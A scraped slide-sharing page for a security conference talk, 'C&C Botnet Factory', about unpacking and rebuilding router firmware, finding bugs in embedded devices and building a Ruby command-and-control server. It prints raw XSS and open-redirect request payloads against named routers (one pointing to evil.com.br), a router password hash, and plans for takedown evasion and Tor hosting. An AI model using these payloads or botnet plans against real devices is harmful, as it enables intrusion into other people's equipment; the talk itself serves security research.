Nullbyte Security Conference, profile picture
Uploaded byNullbyte Security Conference
PDF, PPTX1,117 views

C&C Botnet Factory

The document outlines a project focused on pentesting and creating command and control (C&C) botnets, detailing processes for extracting and analyzing firmware as well as exploiting vulnerabilities in embedded devices. It includes motivational notes, agenda items related to firmwares, bugs, and various hack logs that document reverse engineering efforts to develop exploits. Furthermore, it highlights tools and methods for firmware analysis and outlines next steps for refining the project.

Embed presentation

Download as PDF, PPTX
NullByte-C0n C&C B0tn3t F4ct0ry by: Torontux 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010
# whoami * Toronto Garcez aka Torontux * Pentester * IoT cell leader * BWCon www.bwcon.com.br
# cat agenda.txt * Motivation * Firmwares - how to get? - binwalk + firmware-mod-kit - Cross Compiling, Malta, Busybox * Bugs + bugs + bugs ... * C&C (cec.rb + bn.rb) * Demo * Next steps
# wget http://pastebin.com/raw/0SNSvyjJ _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|__,_|___|_|_ |____/ __,_|___|_|_(_) A DIY Guide ,-._,-._ _,- o O_/; / , ` `| | -.,___, / ` `-.__/ / ,. / `-.__.-` ./ ' / /| ___ ,/ ` ( ( |.-"` '/ ` / ,, | _ | o/o / . , / / ( __`;-;'__`) `//'` `||` ` _// || __ _ _ _____ __ .-"-._,(__) .(__).-""-. | | | | |_ _| | / / | | |_| | | | | / / | | _ | | | | `'-------` `--------'` __| |_| |_| |_| |__ #antisec
# cat hacklog.txt “So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.” “ I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”
# man firmwares * Download Firmware updates * Extract from serial(UART) * Looking for filesystem
# man firmwares * binwalk + hexdump + firmware-mod-kit * Look for big chunks of 00s or FFs delimiting the parts * Check for common compression stream patterns -> zlib: 78 01, 78 9C, 78 DA -> gzip: 1F 8B -> LZMA: 5D 00 00 80 * Offset to extract de filesystem * squashfs
# hexdump -c wr740nv6.bin |more 00000000 01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68 |....TP-LINK Tech | 00000010 6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e |nologies....ver.| 00000020 20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 | 1.0............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03 |.@...........4..| 00000050 18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00 |.v}./..5C..{....| 00000060 d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee |.;.p.[.DJ..3....| 00000070 00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00 |...... ......>..| ... 00120200 68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00 |hsqsS...t..V....| 00120210 29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00 |)...............| 00120220 0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00 |..[.....+.*.....| 00120230 23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff |#.*.............| ...
# binwalk wr740nv6_br.bin DECIMAL HEX DESCRIPTION --------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.- 15447.3, ... 13424 0x3470 U-Boot version string, U-Boot 1.1.4 13472 0x34A0 CRC32 polynomial table, big endian 14784 0x39C0 uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image" 14848 0x3A00 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes 131584 0x20200 TP-Link firmware header, firmware version: 0.0.3 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes 1180160 0x120200 Squashfs filesystem, little endian, version 4.0... # dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs 2+1 registros de entrada 2+1 registros de saída 2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s # file filesystem.squashfs filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,
# binwalk -e wr740nv6_br.bin DECIMAL HEX DESCRIPTION -------------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ... ... 1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04 total 52K 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 bin 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 dev 4,0K drwxr-xr-x 7 root root 4,0K Set 21 2015 etc 4,0K drwxr-xr-x 5 root root 4,0K Set 21 2015 lib 0 lrwxrwxrwx 1 root root 11 Nov 15 13:57 linuxrc -> bin/busybox 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 mnt 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 proc 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 root 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sbin 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sys 4,0K drwxrwxrwt 2 root root 4,0K Set 21 2015 tmp 4,0K drwxr-xr-x 4 root root 4,0K Set 21 2015 usr 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 var 4,0K drwxr-xr-x 10 root root 4,0K Out 13 2015 web # ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
# binwalk wr720nv2-en-up.bin DECIMAL HEXADECIMAL DESCRIPTION ------------------------------------------------------------------ 20 0x14 IMG0 (VxWorks) header, size: 1559872 26740 0x6874 VxWorks operating system version "5.5.1" , compiled: "Jun 18 2013, 12:19:11" 26836 0x68D4 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes 262292 0x40094 IMG0 (VxWorks) header, size: 1297600 262420 0x40114 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes 1256228 0x132B24 Wind River management filesystem, compressed, 194 files 1265584 0x134FB0 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes 1268652 0x135BAC LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes 1268992 0x135D00 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes
# man firmware-mod-kit ./extract-firmware.sh wr740nv6_br.bin fmk/rootfs/ fmk/new-filesystem.squashfs fmk/logs/config.log fmk/logs/binwalk.log fmk/image_parts/header.img fmk/image_parts/rootfs.img ./build-firmware.sh fmk/new-firmware.bin
# man cross compiling |grep mips * gcc-mips-linux-gnu * -static option (Will increase size) * strip * Tks Rafael Machado ;) root@debian-mips:~# ls -lhsa 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 664K -rwxr-xr-x 1 root root 657K Nov 25 18:18 teste root@debian-mips:~# strip teste 4,0K drwx------ 5 root root 4,0K Nov 25 18:18 . 4,0K drwxr-xr-x 21 root root 4,0K Dez 8 2013 .. 608K -rwxr-xr-x 1 root root 604K Nov 25 18:19 teste
# man qemu |grep mips * https://www.linux-mips.org/wiki/MIPS_Malta * Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/ qemu-system-mips -M malta -m 256 -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -vnc 172.16.68.128:0 -net nic -net user,hostfwd=tcp::2222-:22 root@172.16.68.128's password: Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips Last login: Fri Nov 25 17:19:33 2016 root@debian-mips:~# root@debian-mips:~# uname -a Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux
# cd busybox && make menuconfig
# man UART TP-Link TL-WR841ND - 2 detachable antennas - 4 Port 100/10 Switch - 1 Port 100/10 Wan Interface - 4 MB Flash - 32 MB Ram - WPS Button - Wi-Fi On/Off Button * Tks Osvaldo! ;)
# man UART * Find RX/TX/GND/VCC * VCC 3v3 * GND 0,0 * TX about 3v * Velocity 115200 cat /etc/shadow root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::
# cat bugs.txt * looking for bugs: - Web applications (XSS,CSRF,LFI,RCE,etc...) - Memory Corruptions - Hardcoded passwords and Default credentials - Backdoors - Information disclosures
# cat totolink_payload.txt POST /login.cgi HTTP/1.1 Host: 192.168.1.1 Referer: http://192.168.1.1/login.htm Cookie: SessionID= username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte %22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send
# cat linkOne_payloads.txt GET /goform/SafeWanWebMan? GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0" %3balert(1)%2f%2f HTTP/1.1 Host: 192.168.0.1 Cookie: language=en; admin:language=en Connection: keep-alive POST /goform/SysStatusHandle HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Referer: http://192.168.0.1/system_status.asp Cookie: language=en; admin:language=en CMD=WAN_CON&GO=system_status.asp&action=;alert(1) ;
# cat linkOne_payloads2.txt Open Redirect -------------- GET /goform/SysStatusHandle? CMD=&GO=http://www.evil.com.br&action= HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8 Cookie: language=en; admin:language=en Connection: close
# man cec * Command and Control * Ruby * Client and Server (cec.rb and bn.rb) * HTTP * No frameworks(cgi)
# man cec - C&C C&C client bot.sh comands 5s 5s 5s
# ./demo
# cat next_steps.txt * Fix bugs * Code refactor * More features * Criptography * Clients to ARM / MIPS / etc... * TakeDown Evasion
# man tor2web * https://www.tor2web.org/ “Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser” * replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct Anonymity for the server • eqt5g4fuenphqinx.onion • End-to-end encryption
Questions?

More Related Content

PDF
Hacking cable modems the later years
byNullbyte Security Conference
 
PDF
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)
byNullbyte Security Conference
 
PDF
Vt6655 linux user_guide
byMONTBUIAUTOESCOLA
 
PDF
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
byPROIDEA
 
PDF
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
byRootedCON
 
PDF
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
byRootedCON
 
PDF
Snort-IPS-Tutorial
byVladimir Koychev
 
PDF
Metasploitable
bySri Manakula Vinayagar Engineering College
 
Hacking cable modems the later years
byNullbyte Security Conference
 
Windows's Kindnesses - Commoner to D-K(d)OM (Direct Kernel Object Manipulation)
byNullbyte Security Conference
 
Vt6655 linux user_guide
byMONTBUIAUTOESCOLA
 
CONFidence 2017: Hacking embedded with OpenWrt (Vladimir Mitiouchev)
byPROIDEA
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
byRootedCON
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
byRootedCON
 
Snort-IPS-Tutorial
byVladimir Koychev
 
Metasploitable
bySri Manakula Vinayagar Engineering College
 

What's hot

PPTX
U-boot and Android Verified Boot 2.0
byGlobalLogic Ukraine
 
PDF
Snort
bybala150985
 
PPTX
移植FreeRTOS 之嵌入式軟體研究與開發
by艾思程式教育
 
PDF
DefCon 2012 - Hardware Backdooring (Slides)
byMichael Smith
 
PDF
How to twist a IPv6 over Bluetooth (6lowpan)
byNaoto MATSUMOTO
 
PDF
x86_64 Hardware Deep dive
byNaoto MATSUMOTO
 
PDF
ARM Architecture and Meltdown/Spectre
byGlobalLogic Ukraine
 
PDF
OpenWrt101 2007
byRex Tsai
 
PDF
VYATTAによるマルチパスVPN接続手法
byNaoto MATSUMOTO
 
PPT
SAS (Secure Active Switch)
bySecurity Date
 
PDF
最後の楽園の開発をちょこっとだけ手伝った話
bynullnilaki
 
PDF
Don't Get Hacked on Hostile WiFi
byMackenzie Morgan
 
PDF
Hardening Linux and introducing Securix Linux
bySecurity Session
 
PDF
Ganeti - build your own cloud
byDobrica Pavlinušić
 
PDF
Aula 07 pino 1 e soquetes
byAlexandrino Sitoe
 
PDF
SSH: Seguranca no Acesso Remoto
byTiago Cruz
 
DOCX
Linux lv ms step by step
bysudakarman
 
PDF
Hunting Mac Malware with Memory Forensics
byAndrew Case
 
PDF
install mosquitto-auth-plug - cheat sheet -
byNaoto MATSUMOTO
 
PDF
Honeypots: Visão Geral
bybernardo_mr
 
U-boot and Android Verified Boot 2.0
byGlobalLogic Ukraine
 
Snort
bybala150985
 
移植FreeRTOS 之嵌入式軟體研究與開發
by艾思程式教育
 
DefCon 2012 - Hardware Backdooring (Slides)
byMichael Smith
 
How to twist a IPv6 over Bluetooth (6lowpan)
byNaoto MATSUMOTO
 
x86_64 Hardware Deep dive
byNaoto MATSUMOTO
 
ARM Architecture and Meltdown/Spectre
byGlobalLogic Ukraine
 
OpenWrt101 2007
byRex Tsai
 
VYATTAによるマルチパスVPN接続手法
byNaoto MATSUMOTO
 
SAS (Secure Active Switch)
bySecurity Date
 
最後の楽園の開発をちょこっとだけ手伝った話
bynullnilaki
 
Don't Get Hacked on Hostile WiFi
byMackenzie Morgan
 
Hardening Linux and introducing Securix Linux
bySecurity Session
 
Ganeti - build your own cloud
byDobrica Pavlinušić
 
Aula 07 pino 1 e soquetes
byAlexandrino Sitoe
 
SSH: Seguranca no Acesso Remoto
byTiago Cruz
 
Linux lv ms step by step
bysudakarman
 
Hunting Mac Malware with Memory Forensics
byAndrew Case
 
install mosquitto-auth-plug - cheat sheet -
byNaoto MATSUMOTO
 
Honeypots: Visão Geral
bybernardo_mr
 

Similar to C&C Botnet Factory

PDF
Filip palian mateuszkocielski. simplest ownage human observed… routers
byYury Chemerkin
 
PDF
Simplest-Ownage-Human-Observed… - Routers
byLogicaltrust pl
 
PDF
Valerio Di Giampietro - Introduction To IoT Reverse Engineering with an examp...
bylinuxlab_conf
 
PPTX
Advanced SOHO Router Exploitation XCON
byLyon Yang
 
PPTX
Steelcon 2015 - 0wning the internet of trash
byinfodox
 
PDF
Development platform virtualization using qemu
byPremjith Achemveettil
 
PDF
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
PDF
Embedded linux barco-20121001
byMarc Leeman
 
PDF
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
byLyon Yang
 
PDF
005 skyeye
bySherif Mousa
 
PDF
DEF CON 27 - PHILIPPE LAULHERET - introduction to hardware hacking extended v...
byFelipe Prado
 
PDF
MIPS-X
byZoltan Balazs
 
PDF
FreeBSD under DigitalOcean VPS
byRyo ONODERA
 
PDF
Beginners guide on how to start exploring IoT 2nd session
byveerababu penugonda(Mr-IoT)
 
PPT
Basic Linux kernel
byMorteza Nourelahi Alamdari
 
PPTX
Beyond printk: Efficient Zynq UltraScale+ MPSoC Linux Debugging and Development
byZach Pfeffer
 
PDF
A Journey to Boot Linux on Raspberry Pi
byJian-Hong Pan
 
PDF
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
by44CON
 
PDF
It's Assembler, Jim, but not as we know it: (ab)using binaries from embedded ...
byPriyanka Aash
 
PDF
Porting Android
byOpersys inc.
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
byYury Chemerkin
 
Simplest-Ownage-Human-Observed… - Routers
byLogicaltrust pl
 
Valerio Di Giampietro - Introduction To IoT Reverse Engineering with an examp...
bylinuxlab_conf
 
Advanced SOHO Router Exploitation XCON
byLyon Yang
 
Steelcon 2015 - 0wning the internet of trash
byinfodox
 
Development platform virtualization using qemu
byPremjith Achemveettil
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
Embedded linux barco-20121001
byMarc Leeman
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
byLyon Yang
 
005 skyeye
bySherif Mousa
 
DEF CON 27 - PHILIPPE LAULHERET - introduction to hardware hacking extended v...
byFelipe Prado
 
MIPS-X
byZoltan Balazs
 
FreeBSD under DigitalOcean VPS
byRyo ONODERA
 
Beginners guide on how to start exploring IoT 2nd session
byveerababu penugonda(Mr-IoT)
 
Basic Linux kernel
byMorteza Nourelahi Alamdari
 
Beyond printk: Efficient Zynq UltraScale+ MPSoC Linux Debugging and Development
byZach Pfeffer
 
A Journey to Boot Linux on Raspberry Pi
byJian-Hong Pan
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
by44CON
 
It's Assembler, Jim, but not as we know it: (ab)using binaries from embedded ...
byPriyanka Aash
 
Porting Android
byOpersys inc.
 

More from Nullbyte Security Conference

PDF
Speeding up Red Team engagements with carnivorall
byNullbyte Security Conference
 
PDF
Gitminer 2.0 - Advance Search on Github
byNullbyte Security Conference
 
PDF
Automatizando o abuso de repositórios expostos
byNullbyte Security Conference
 
PDF
Windows Internals: fuzzing, hijacking and weaponizing kernel objects
byNullbyte Security Conference
 
PDF
Is rust language really safe?
byNullbyte Security Conference
 
PDF
Stealth post-exploitation with phpsploit
byNullbyte Security Conference
 
PDF
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
byNullbyte Security Conference
 
PDF
Muito além do alert() em ataques web client side
byNullbyte Security Conference
 
PDF
Cabra Arretado Aperriando o WordPress
byNullbyte Security Conference
 
PDF
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
byNullbyte Security Conference
 
PDF
How i cracked millions of “pt br” hashed passwords
byNullbyte Security Conference
 
PDF
Evitando execução de códigos arbitrários com GRsecurity e PaX
byNullbyte Security Conference
 
PDF
All your binaries are belong to us
byNullbyte Security Conference
 
Speeding up Red Team engagements with carnivorall
byNullbyte Security Conference
 
Gitminer 2.0 - Advance Search on Github
byNullbyte Security Conference
 
Automatizando o abuso de repositórios expostos
byNullbyte Security Conference
 
Windows Internals: fuzzing, hijacking and weaponizing kernel objects
byNullbyte Security Conference
 
Is rust language really safe?
byNullbyte Security Conference
 
Stealth post-exploitation with phpsploit
byNullbyte Security Conference
 
Anti-Anti-Forense de Memória: Abortando o "Abort Factor"
byNullbyte Security Conference
 
Muito além do alert() em ataques web client side
byNullbyte Security Conference
 
Cabra Arretado Aperriando o WordPress
byNullbyte Security Conference
 
Rootkits em kernel space - Redshift, um rootkit para o kernel do FreeBSD
byNullbyte Security Conference
 
How i cracked millions of “pt br” hashed passwords
byNullbyte Security Conference
 
Evitando execução de códigos arbitrários com GRsecurity e PaX
byNullbyte Security Conference
 
All your binaries are belong to us
byNullbyte Security Conference
 

Recently uploaded

PDF
Implementing A Data Lakehouse Using Iceberg & Spark
byAnass Nabil
 
PDF
One String, Many Prompts: AI Code Generation
byGeoffrey Goetz
 
PDF
Top 10 Dedicated Server Providers in Stockholm (Updated Edition).pdf
byAtal Networks
 
PPTX
Fortify Your Digital Defenses with ServiceNow Security Operations by Suma Soft
byGavin Ellis
 
PDF
Intro to CrafterQ - AI Agent Platform for the Enterprise.pdf
byCrafterQ
 
PPTX
Accelerate Innovation with Engineering R&D Services
byChetu
 
PDF
Just Eat Data Scraping For Restaurant Reviews And Pricing.pdf
byfusiondata2026
 
PPTX
Webinar: EVerest for Production: Accelerating EV Charger Development w/ Indus...
byDanBrown980551
 
PDF
Chapter 2 Computer Threat .pdf
byGetnet Tigabie Askale -(GM)
 
PDF
Presentation of Cybersecurity and data protection
bytarikaityahya2
 
PDF
Unlocking Gen AI Capabilities Within UiPath Document Understanding
byDianaGray10
 
PDF
Best 10 Dedicated Servers in Amsterdam, Netherlands (2026 Enterprise Edition)...
byAtal Networks
 
PPTX
Spacewalk 2026 - Presented at the IMAX in Raleigh, NC
byAll Things Open
 
PPT
connectives-linking words in English.ppt
byAmrMohammed82
 
PDF
Effective Ai powered mock interview .pdf
byamazingnishusingh766
 
PDF
Hart, Inc. M&A Data Transition Checklist
byHart, Inc.
 
PPTX
About Computer Hardware ................
bymaratiakshaya07
 
PPTX
Design Flaws and Known Attacks in Agentic AI - ITI Business Session
byInformation Technology Institute
 
PPTX
Microsoft Azure News - January 2026 - BAUG
byDaniel Toomey
 
PDF
TrustArc Webinar - Unpacking India’s DPDP Act: What You Should Know
byTrustArc
 
Implementing A Data Lakehouse Using Iceberg & Spark
byAnass Nabil
 
One String, Many Prompts: AI Code Generation
byGeoffrey Goetz
 
Top 10 Dedicated Server Providers in Stockholm (Updated Edition).pdf
byAtal Networks
 
Fortify Your Digital Defenses with ServiceNow Security Operations by Suma Soft
byGavin Ellis
 
Intro to CrafterQ - AI Agent Platform for the Enterprise.pdf
byCrafterQ
 
Accelerate Innovation with Engineering R&D Services
byChetu
 
Just Eat Data Scraping For Restaurant Reviews And Pricing.pdf
byfusiondata2026
 
Webinar: EVerest for Production: Accelerating EV Charger Development w/ Indus...
byDanBrown980551
 
Chapter 2 Computer Threat .pdf
byGetnet Tigabie Askale -(GM)
 
Presentation of Cybersecurity and data protection
bytarikaityahya2
 
Unlocking Gen AI Capabilities Within UiPath Document Understanding
byDianaGray10
 
Best 10 Dedicated Servers in Amsterdam, Netherlands (2026 Enterprise Edition)...
byAtal Networks
 
Spacewalk 2026 - Presented at the IMAX in Raleigh, NC
byAll Things Open
 
connectives-linking words in English.ppt
byAmrMohammed82
 
Effective Ai powered mock interview .pdf
byamazingnishusingh766
 
Hart, Inc. M&A Data Transition Checklist
byHart, Inc.
 
About Computer Hardware ................
bymaratiakshaya07
 
Design Flaws and Known Attacks in Agentic AI - ITI Business Session
byInformation Technology Institute
 
Microsoft Azure News - January 2026 - BAUG
byDaniel Toomey
 
TrustArc Webinar - Unpacking India’s DPDP Act: What You Should Know
byTrustArc
 

C&C Botnet Factory

  • 1.
    NullByte-C0n C&C B0tn3t F4ct0ry by:Torontux 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010 10111 00101 00101 01001 01010 10101 00101 01010 10101 00101 01010
  • 2.
    # whoami * TorontoGarcez aka Torontux * Pentester * IoT cell leader * BWCon www.bwcon.com.br
  • 3.
    # cat agenda.txt *Motivation * Firmwares - how to get? - binwalk + firmware-mod-kit - Cross Compiling, Malta, Busybox * Bugs + bugs + bugs ... * C&C (cec.rb + bn.rb) * Demo * Next steps
  • 4.
    # wget http://pastebin.com/raw/0SNSvyjJ __ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|__,_|___|_|_ |____/ __,_|___|_|_(_) A DIY Guide ,-._,-._ _,- o O_/; / , ` `| | -.,___, / ` `-.__/ / ,. / `-.__.-` ./ ' / /| ___ ,/ ` ( ( |.-"` '/ ` / ,, | _ | o/o / . , / / ( __`;-;'__`) `//'` `||` ` _// || __ _ _ _____ __ .-"-._,(__) .(__).-""-. | | | | |_ _| | / / | | |_| | | | | / / | | _ | | | | `'-------` `--------'` __| |_| |_| |_| |__ #antisec
  • 5.
    # cat hacklog.txt “So,I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.” “ I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”
  • 6.
    # man firmwares *Download Firmware updates * Extract from serial(UART) * Looking for filesystem
  • 7.
    # man firmwares *binwalk + hexdump + firmware-mod-kit * Look for big chunks of 00s or FFs delimiting the parts * Check for common compression stream patterns -> zlib: 78 01, 78 9C, 78 DA -> gzip: 1F 8B -> LZMA: 5D 00 00 80 * Offset to extract de filesystem * squashfs
  • 8.
    # hexdump -cwr740nv6.bin |more 00000000 01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68 |....TP-LINK Tech | 00000010 6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e |nologies....ver.| 00000020 20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00 | 1.0............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000040 07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03 |.@...........4..| 00000050 18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00 |.v}./..5C..{....| 00000060 d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee |.;.p.[.DJ..3....| 00000070 00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00 |...... ......>..| ... 00120200 68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00 |hsqsS...t..V....| 00120210 29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00 |)...............| 00120220 0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00 |..[.....+.*.....| 00120230 23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff |#.*.............| ...
  • 9.
    # binwalk wr740nv6_br.bin DECIMALHEX DESCRIPTION --------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.- 15447.3, ... 13424 0x3470 U-Boot version string, U-Boot 1.1.4 13472 0x34A0 CRC32 polynomial table, big endian 14784 0x39C0 uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image" 14848 0x3A00 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes 131584 0x20200 TP-Link firmware header, firmware version: 0.0.3 132096 0x20400 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes 1180160 0x120200 Squashfs filesystem, little endian, version 4.0... # dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs 2+1 registros de entrada 2+1 registros de saída 2883584 bytes (2,9 MB) copiados, 0,0106605 s, 270 MB/s # file filesystem.squashfs filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,
  • 10.
    # binwalk -ewr740nv6_br.bin DECIMAL HEX DESCRIPTION -------------------------------------------------------------------------- 0 0x0 TP-Link firmware header, firmware version: 0.-15447.3, ... ... 1180160 0x120200 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04 total 52K 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 bin 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 dev 4,0K drwxr-xr-x 7 root root 4,0K Set 21 2015 etc 4,0K drwxr-xr-x 5 root root 4,0K Set 21 2015 lib 0 lrwxrwxrwx 1 root root 11 Nov 15 13:57 linuxrc -> bin/busybox 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 mnt 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 proc 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 root 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sbin 4,0K drwxr-xr-x 2 root root 4,0K Set 21 2015 sys 4,0K drwxrwxrwt 2 root root 4,0K Set 21 2015 tmp 4,0K drwxr-xr-x 4 root root 4,0K Set 21 2015 usr 4,0K drwxr-xr-x 3 root root 4,0K Set 21 2015 var 4,0K drwxr-xr-x 10 root root 4,0K Out 13 2015 web # ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
  • 11.
    # binwalk wr720nv2-en-up.bin DECIMALHEXADECIMAL DESCRIPTION ------------------------------------------------------------------ 20 0x14 IMG0 (VxWorks) header, size: 1559872 26740 0x6874 VxWorks operating system version "5.5.1" , compiled: "Jun 18 2013, 12:19:11" 26836 0x68D4 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes 262292 0x40094 IMG0 (VxWorks) header, size: 1297600 262420 0x40114 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes 1256228 0x132B24 Wind River management filesystem, compressed, 194 files 1265584 0x134FB0 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes 1268652 0x135BAC LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes 1268992 0x135D00 LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes
  • 12.
    # man firmware-mod-kit ./extract-firmware.shwr740nv6_br.bin fmk/rootfs/ fmk/new-filesystem.squashfs fmk/logs/config.log fmk/logs/binwalk.log fmk/image_parts/header.img fmk/image_parts/rootfs.img ./build-firmware.sh fmk/new-firmware.bin
  • 13.
